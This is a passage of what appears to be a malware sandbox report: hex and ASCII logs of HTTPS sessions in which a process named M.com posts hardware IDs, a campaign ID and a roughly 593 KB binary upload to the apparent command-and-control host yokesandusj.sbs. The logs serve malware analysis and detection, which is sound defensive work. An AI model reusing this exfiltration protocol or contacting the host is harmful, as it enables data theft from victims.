                                                                                                                                                                                                                                                              2025-01-06 11:16:46 UTC15331OUTData Raw: 2d 2d 4e 52 34 33 4d 46 5a 33 36 5a 56 41 36 54 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 41 45 37 36 32 30 36 43 32 42 30 36 31 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 4e 52 34 33 4d 46 5a 33 36 5a 56 41 36 54 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4e 52 34 33 4d 46 5a 33 36 5a 56 41 36 54 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 4e 52 34 33 4d 46
                                                                                                                                                                                                                                                              Data Ascii: --NR43MFZ36ZVA6THContent-Disposition: form-data; name="hwid"59AE76206C2B06176D75A801C764DBB8--NR43MFZ36ZVA6THContent-Disposition: form-data; name="pid"3--NR43MFZ36ZVA6THContent-Disposition: form-data; name="lid"hRjzG3--TRON--NR43MF
                                                                                                                                                                                                                                                              2025-01-06 11:16:46 UTC5217OUTData Raw: da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: h'F3Wun 4F([:7s~X`nO`i
                                                                                                                                                                                                                                                              2025-01-06 11:16:47 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:47 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=p83ekns448euqrqerg13m9iafs; expires=Fri, 02 May 2025 05:03:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P8chrwan%2B3fJJr0OvHkI%2B1%2BUn543EZ1%2B3p1ZETJ5okr3mFrqROY1W6VZ8jGFTrSuyRpOgRqf57AMsT%2BGYpPTtahj4qcBYyTwgAbmv6HTs8MV6zsXzp4fZrlcqwvRDZnuOQk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c402cbf8ce3-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1852&min_rtt=1805&rtt_var=710&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21506&delivery_rate=1617728&cwnd=252&unsent_bytes=0&cid=d890df5452665fcc&ts=605&x=0"
                                                                                                                                                                                                                                                              2025-01-06 11:16:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2025-01-06 11:16:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              5192.168.2.549877104.21.44.1594431532C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2025-01-06 11:16:48 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=KOQNT3SGI296IF2QAE
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 7139
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
                                                                                                                                                                                                                                                              2025-01-06 11:16:48 UTC7139OUTData Raw: 2d 2d 4b 4f 51 4e 54 33 53 47 49 32 39 36 49 46 32 51 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 41 45 37 36 32 30 36 43 32 42 30 36 31 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 4b 4f 51 4e 54 33 53 47 49 32 39 36 49 46 32 51 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 4f 51 4e 54 33 53 47 49 32 39 36 49 46 32 51 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d
                                                                                                                                                                                                                                                              Data Ascii: --KOQNT3SGI296IF2QAEContent-Disposition: form-data; name="hwid"59AE76206C2B06176D75A801C764DBB8--KOQNT3SGI296IF2QAEContent-Disposition: form-data; name="pid"1--KOQNT3SGI296IF2QAEContent-Disposition: form-data; name="lid"hRjzG3--TRON
                                                                                                                                                                                                                                                              2025-01-06 11:16:48 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:48 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=aavtssq15q4jpieodmjrp141oc; expires=Fri, 02 May 2025 05:03:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rzQLan1a1hAY6sAKNxk9SdwWL0keFO%2BwZpfbOmMpjgy024AAGICorhWJ5gtE7pitgmG739KesCuqSbd0RgJeL4udj0k1tfsZbEzBLNuVroI2sRXyzASuYOkjcb%2F2d5Ao%2FYY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c492f5543fa-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1566&rtt_var=601&sent=7&recv=11&lost=0&retrans=0&sent_bytes=2837&recv_bytes=8055&delivery_rate=1801357&cwnd=159&unsent_bytes=0&cid=e57c454fcb85fee1&ts=519&x=0"
                                                                                                                                                                                                                                                              2025-01-06 11:16:48 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2025-01-06 11:16:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              6192.168.2.549888104.21.44.1594431532C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2025-01-06 11:16:49 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=T8MBODCY143BWRCL3J3
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1257
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
                                                                                                                                                                                                                                                              2025-01-06 11:16:49 UTC1257OUTData Raw: 2d 2d 54 38 4d 42 4f 44 43 59 31 34 33 42 57 52 43 4c 33 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 41 45 37 36 32 30 36 43 32 42 30 36 31 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 54 38 4d 42 4f 44 43 59 31 34 33 42 57 52 43 4c 33 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 38 4d 42 4f 44 43 59 31 34 33 42 57 52 43 4c 33 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52
                                                                                                                                                                                                                                                              Data Ascii: --T8MBODCY143BWRCL3J3Content-Disposition: form-data; name="hwid"59AE76206C2B06176D75A801C764DBB8--T8MBODCY143BWRCL3J3Content-Disposition: form-data; name="pid"1--T8MBODCY143BWRCL3J3Content-Disposition: form-data; name="lid"hRjzG3--TR
                                                                                                                                                                                                                                                              2025-01-06 11:16:49 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:49 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=1397uomjh7557chalofrjqhph7; expires=Fri, 02 May 2025 05:03:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SGVnqB9gQ1NEYM%2FckhPMbpO0bp1OQCBVha%2FLdZNP%2Br2Hl6tknuZ%2Fj98e0F9z5mYw5WsNoGlBsVIZSs9FUaZyQVgO8eOPspN6njfVrmHWvZicvL6jMkklVvWuro0ospwtibk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c4f9aac431f-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1684&rtt_var=646&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2174&delivery_rate=1673352&cwnd=250&unsent_bytes=0&cid=3ec8dcb61900e16d&ts=473&x=0"
                                                                                                                                                                                                                                                              2025-01-06 11:16:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2025-01-06 11:16:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              7192.168.2.549897104.21.44.1594431532C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2025-01-06 11:16:50 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=Y2BM2JBPEECL
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 593404
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
                                                                                                                                                                                                                                                              2025-01-06 11:16:50 UTC15331OUTData Raw: 2d 2d 59 32 42 4d 32 4a 42 50 45 45 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 41 45 37 36 32 30 36 43 32 42 30 36 31 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 59 32 42 4d 32 4a 42 50 45 45 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 32 42 4d 32 4a 42 50 45 45 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 59 32 42 4d 32 4a 42 50 45 45 43 4c 0d 0a 43
                                                                                                                                                                                                                                                              Data Ascii: --Y2BM2JBPEECLContent-Disposition: form-data; name="hwid"59AE76206C2B06176D75A801C764DBB8--Y2BM2JBPEECLContent-Disposition: form-data; name="pid"1--Y2BM2JBPEECLContent-Disposition: form-data; name="lid"hRjzG3--TRON--Y2BM2JBPEECLC
                                                                                                                                                                                                                                                              2025-01-06 11:16:50 UTC15331OUTData Raw: 40 74 e5 91 bf 4b fe 92 d2 e2 49 8e 8a 72 b0 20 f0 b3 88 6b 0e 10 00 6f 84 ec d4 6a c1 f5 10 a7 03 63 1a b7 2b 44 d7 35 ea b7 99 5b 8f 24 04 e4 c5 96 b1 84 7b a1 e6 7a 01 c2 24 29 52 a5 c9 bb c0 d2 b2 9d fb e5 69 e5 26 41 42 7a e7 ab c7 85 2c 8c 54 61 df 83 4f 98 ef 0a 1d fa b8 3c 71 5a 39 ba 4a 10 88 55 4e 3e cf 07 d4 a9 06 ac 76 f9 a9 05 87 5e 83 5f 4f 57 2b 5d ff 93 43 c1 e2 9c 91 d7 0f 42 5d 45 59 8b bf a9 ed 8f e1 8f 4e 30 80 2f ca b7 da 1e 94 b7 41 7e ee 17 b0 73 63 76 3c d3 65 fd cf 1f 94 b9 33 ab fc ee 56 02 93 dd 90 3c 32 7a 6f ec 01 fb 91 ae 52 a7 c0 de fc b7 d0 76 d4 e5 31 60 97 7c f9 df 86 ce ba 6a 84 1f 74 80 39 1c 22 36 a9 f9 08 e0 78 25 02 24 99 a6 0d e6 68 ac 7f 32 ab 80 12 20 89 e2 ee a0 84 ec 8f 83 b7 36 29 17 3a ed 20 e6 3e b9 7e 61 e0
                                                                                                                                                                                                                                                              Data Ascii: @tKIr kojc+D5[${z$)Ri&ABz,TaO<qZ9JUN>v^_OW+]CB]EYN0/A~scv<e3V<2zoRv1`|jt9"6x%$h2 6): >~a
                                                                                                                                                                                                                                                              2025-01-06 11:16:50 UTC15331OUTData Raw: 76 db 65 24 45 89 f4 4f 94 ef 97 4d 63 03 0d ca 5e d3 3b cb 7e dd 7f 1f ee 97 1d 17 1b bb a1 75 1e f9 b8 6e 9e 83 08 cf 75 59 f4 79 8e 2e ea e8 9a 2c f3 c2 ce 76 f4 5f 7b 08 d9 b4 05 62 db 07 73 a9 5f a3 4a 74 b1 b7 f9 94 59 41 5f 01 70 76 9b 1e e4 de d9 31 c3 70 da ac 1c 58 aa dc b1 60 7f 80 d7 3e 14 3c 9e b8 70 53 f1 32 bd 6e 7d 7e 71 d0 4c 6f 71 45 87 fe 47 0b 20 76 2e 46 1d d1 0a ca c9 f4 7f 61 b2 31 f5 d4 f9 ea 70 82 ca de ea 99 fa 6e 93 3d 59 55 db d0 f0 03 06 91 92 84 02 f1 66 5e 6d 35 d6 83 0c 79 6e 28 af 9b 3e f4 bf e7 54 9e 06 f4 dd bf b5 c7 43 2f 08 44 5c 00 e1 43 37 c3 3d 00 5b f6 29 00 27 cd 40 7f 38 e8 bf 3e e3 83 7c 5b 0c 28 3c 27 6e f3 ff 1e ce 93 74 54 c0 e6 b5 28 82 9e 05 a1 c6 8a 26 86 00 c0 63 84 9b 41 56 43 6d 75 53 63 39 3a 80 f9 a0
                                                                                                                                                                                                                                                              Data Ascii: ve$EOMc^;~unuYy.,v_{bs_JtYA_pv1pX`><pS2n}~qLoqEG v.Fa1pn=YUf^m5yn(>TC/D\C7=[)'@8>|[(<'ntT(&cAVCmuSc9:
                                                                                                                                                                                                                                                              2025-01-06 11:16:50 UTC15331OUTData Raw: fa bb 87 a5 ca 73 54 28 82 87 9f c3 4e ca 2a 5d 1f b4 eb 29 a1 9d 80 65 55 ae 89 f1 5b d5 1d 31 33 54 fe aa 74 2f 13 b4 97 09 16 4b db 31 85 1c 80 a5 4e 76 68 0d e0 51 b6 51 9f 58 51 41 90 8b fa 20 52 31 5e 1c bd 67 37 bb f0 28 93 ef f0 91 f1 0a ba c2 4c 4b 96 bc 92 82 73 98 03 b8 02 cb ac 33 f2 17 70 88 ed 35 06 0d 2e b7 10 7e f7 e8 67 b6 93 b9 4e a9 1e 3c c9 4f e1 b4 ae 30 29 0e fc 0b 2b 5f b1 1b 2b f5 af 0e 58 2d ab f8 a6 4a da 52 0b 70 4c a9 7e 7e f2 c1 0f ce 41 70 24 e4 92 08 e0 6d ca 20 91 86 04 69 60 97 72 31 23 50 a8 c9 de d8 51 cd 37 2b c8 52 ba a6 bb 0c 10 f6 6f 6b 45 cd b3 17 4a 04 5f 8b 01 d1 83 57 47 1c 95 c1 46 0f 27 98 23 c9 5d 9d f5 29 fa c0 9a 16 e2 6c a1 2b d6 55 a9 65 39 dc c8 6f 7e 3d 9f d9 93 05 f3 ad c1 66 f5 de 7f b8 06 5f b9 f1 3d
                                                                                                                                                                                                                                                              Data Ascii: sT(N*])eU[13Tt/K1NvhQQXQA R1^g7(LKs3p5.~gN<O0)+_+X-JRpL~~Ap$m i`r1#PQ7+RokEJ_WGF'#])l+Ue9o~=f_=
                                                                                                                                                                                                                                                              2025-01-06 11:16:50 UTC15331OUTData Raw: 7a 8c 4e 0f f1 9c bb 26 97 72 52 a1 9b 2f 2f 49 78 a1 ad 31 6a 92 df 8f de 90 93 4c fc 8e 43 03 2d 09 c1 d8 98 3d 18 2f d6 45 06 aa 3d 26 d4 d4 b4 1c 56 7a 30 ea a4 82 cc fa be f6 b1 6a 7d 8e a9 77 bb 3e 82 8f 3b e8 84 ef 78 ff 61 99 ed f9 4f 0c bc fc ee eb 39 13 d9 b1 2e 77 8a 3e 9f d6 15 b9 ff 50 8f e0 e0 40 eb 69 bc 79 88 38 bc bf 59 23 9c 70 f0 f0 cc 6f da 51 cb 9c c8 44 46 7c 81 b1 c0 b8 58 8d bd 6e de c2 99 d1 2c 7d 01 2f 5f 0d f9 68 fe 95 fc 0e f5 e3 bb db e1 78 81 5d 5a 97 4f 13 33 23 f0 cf ef b5 77 e5 2e 73 4a 04 4f cc fb 5c 76 8e c2 0c 43 f7 e4 31 82 52 88 f5 86 cc 60 76 b1 46 ee 0b 29 3c e6 1c c8 db 23 18 a5 4c a9 b8 68 d7 1f 85 58 48 9c ad d5 57 f4 fe bf 53 f5 ff bf 0b a4 42 96 27 60 42 70 60 b5 8e a6 e8 03 2d 38 34 1e d3 0f de b6 82 54 62 1d
                                                                                                                                                                                                                                                              Data Ascii: zN&rR//Ix1jLC-=/E=&Vz0j}w>;xaO9.w>P@iy8Y#poQDF|Xn,}/_hx]ZO3#w.sJO\vC1R`vF)<#LhXHWSB'`Bp`-84Tb
                                                                                                                                                                                                                                                              2025-01-06 11:16:50 UTC15331OUTData Raw: 72 5f 65 57 c3 14 e2 2b d6 c3 4e 38 7e f6 86 ad 3e ed 4d 08 f5 22 7f b5 10 9c 49 62 f3 ea 03 9f dc 86 66 d4 16 0b d7 bf 99 1e 24 5b 72 9f 73 52 4a fb 47 08 6f 66 0a 35 f6 4a bd a1 25 ef 76 d4 b9 7c b7 f8 dd 6b 5d 34 99 ae 03 ea c2 63 66 2f ce 52 97 f9 86 f2 51 e1 67 09 8f f6 78 04 a5 22 4d 14 aa ae f9 b0 93 07 c3 c6 62 db ec 87 0c 78 50 6e cb 91 f5 94 e7 4e 1e 3e 1b c9 35 c4 33 d4 e7 ef e2 4e be 1e 15 c0 21 1b 4c 19 72 63 55 09 98 a8 00 1c 70 6b 32 97 a1 68 67 c2 1e 9a f8 42 13 6d 09 f4 f1 19 6a 10 04 71 af 0a af 1c 9e 1a 0b 24 f5 ab ce 0d 86 1a 29 fd 6c da 30 05 8d 16 aa 89 21 f1 48 6c c9 8a 80 be 1e 72 6d f3 82 6f f2 d0 6c 52 cc 4e df a2 ea ca 4f ff a0 d4 5e aa df 35 92 53 5a e5 83 e6 22 c8 fa 55 4a e9 76 c1 89 7d 28 60 66 f5 f7 3b 7a ae 19 68 0c 28 05
                                                                                                                                                                                                                                                              Data Ascii: r_eW+N8~>M"Ibf$[rsRJGof5J%v|k]4cf/RQgx"MbxPnN>53N!LrcUpk2hgBmjq$)l0!HlrmolRNO^5SZ"UJv}(`f;zh(
                                                                                                                                                                                                                                                              2025-01-06 11:16:50 UTC15331OUTData Raw: ad ac 77 25 6a 32 4f 20 a2 4f a2 a9 20 ac c7 85 5a cd ac 60 c6 2d 1d bb 27 aa 1b 77 6f ff e7 82 47 e2 34 fe 25 7e d5 58 25 1a cf b2 f0 5a ef 15 bc e6 8e 17 5f ab c0 f0 88 65 84 47 f4 aa d0 92 83 00 43 db 20 af fb 08 78 7f 54 55 60 61 79 72 39 ab 46 37 06 33 6b 39 6c 22 8d 24 fd 4b 49 59 43 5e 67 aa 44 88 d2 2d 97 93 29 46 00 df 4c a4 56 d8 96 f9 9c 8d 25 56 1d de ee f9 4e 91 dd 49 6f 19 ee 7c 9f a8 e5 5b ea c9 99 77 e7 f8 d0 97 16 3f 53 d6 dd df fd 50 5f fc 09 48 19 3e 8c 24 fd 17 08 da fe 80 d2 2b 3d 3b 62 48 9a f9 5d 2f 97 5b c0 c3 48 0b 2c 35 6f da fb 4d 7c e7 08 15 93 33 31 21 a6 38 c0 2e be 95 f1 a2 33 67 33 f9 bb ad 12 94 65 93 e1 fd dd 37 1d 05 fe 94 21 39 f9 6f ae 82 8c 36 4b 1c f8 34 c2 45 2d 3c 5d 96 f8 d9 f7 36 5c a2 d2 fc 03 84 4a 98 6b fe c1
                                                                                                                                                                                                                                                              Data Ascii: w%j2O O Z`-'woG4%~X%Z_eGC xTU`ayr9F73k9l"$KIYC^gD-)FLV%VNIo|[w?SP_H>$+=;bH]/[H,5oM|31!8.3g3e7!9o6K4E-<]6\Jk
                                                                                                                                                                                                                                                              2025-01-06 11:16:50 UTC15331OUTData Raw: ab b0 7e f7 bb 85 3b 09 2d eb 3e 9e ec aa b9 7e 1c 7c cb d0 5f 20 10 02 2b db ab 55 98 5f 65 b7 f0 7e c7 2a cb 07 b3 8b 17 29 8b cb ea 81 cc 9b 15 08 21 2f 22 5f 94 50 70 aa d3 b7 4c f0 23 60 27 5f 9f d6 93 5f 7a 6a 41 35 82 48 e7 5a ed 90 f8 f4 90 05 f5 36 1c f4 12 30 30 98 59 ef 68 66 39 1e e4 ed 92 02 7b 99 47 1b ea dd 01 65 1f 3e 23 36 7a 40 04 14 66 af fa b7 1e 31 63 bc 12 00 7b 5a 60 75 7c e6 31 e0 24 8e 0d 7c 2a d6 35 c3 03 0e f0 b8 62 81 cb 61 d8 1e d8 8d 8e c0 a5 98 97 62 f8 33 ef 68 df 46 7d dc a2 5f 75 11 c0 25 76 ba 32 fb e1 b5 c1 26 33 02 ca fe 33 85 0f 1a 3f 46 46 73 fc f7 e3 55 18 2a ad 26 72 ed 3f 31 3b 18 b7 2e 28 61 01 26 4d b6 d1 88 6c b0 ea 84 39 05 c8 e6 e4 84 24 4f 09 ca 49 80 22 66 c8 57 1f 30 27 5f 22 33 95 a1 1c 83 df f7 07 ce 9a
                                                                                                                                                                                                                                                              Data Ascii: ~;->~|_ +U_e~*)!/"_PpL#`'__zjA5HZ600Yhf9{Ge>#6z@f1c{Z`u|1$|*5bab3hF}_u%v2&33?FFsU*&r?1;.(a&Ml9$OI"fW0'_"3
